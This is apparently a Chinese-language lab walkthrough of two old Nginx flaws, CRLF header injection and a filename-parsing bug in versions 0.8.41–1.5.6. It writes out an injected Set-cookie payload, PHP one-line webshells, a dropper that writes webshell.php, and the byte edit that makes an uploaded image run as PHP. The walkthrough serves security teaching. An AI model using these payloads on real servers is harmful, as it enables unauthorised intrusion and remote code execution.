一、CRLF注入漏洞

原理：Nginx将传入的url进行解码，对其中的%0a%0d替换成换行符，导致后面的数据注入至头部，造成CRLF 注入漏洞

1、开环境

2、访问网站，并抓包

3、构造请求头

%0ASet-cookie:JSPSESSID%3D1 

这样就可以看到响应头里有我们刚刚添加的cookie了

二、文件名逻辑漏洞

原理：非法字符空格和截止符（\0）会导致Nginx解析URI时的有限状态机混乱，此漏洞可导致目录跨越及代码执行，其影响版本为：nginx 0.8.41 – 1.5.6

1、开环境

2、制造木马

在我们本地新建一个1.jpg（因为这里只能上传图片文件）里面写入一句话木马

<?php @eval($_POST[cmd]);?>

3、上传木马，抓包

4、修改数据包

在文件名的最后加个空格，就可以把木马上传进去

5、放行，访问木马

这里看到木马已经上传进去了

（1）直接访问是访问不到的，我们需要在文件名后加...php然后抓包

（2）抓到包之后修改数据包，把2e 2e 2e修改为20 00 2e

（3）放行

修改完成之后放行就可以访问到木马了

6、测试连接

这里发现我们的木马文件虽然传上去了，但是因为我们的木马文件被编码了，所以直接连是连不上的，所以我们需要重新构造木马文件

7、重新构造文件上传

这串代码的意思是：在当前目录生成一个webshell.php文件，里面是一句话木马

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

上传2.jpg，抓包，加空格，放行

访问刚刚上传的文件，这一步是为了执行代码

/uploadfiles/2.jpg...php

还是抓包，修改为20 00 2e

执行成功之后去访问我们木马里写的webshell.php文件

8、访问成功，测试连接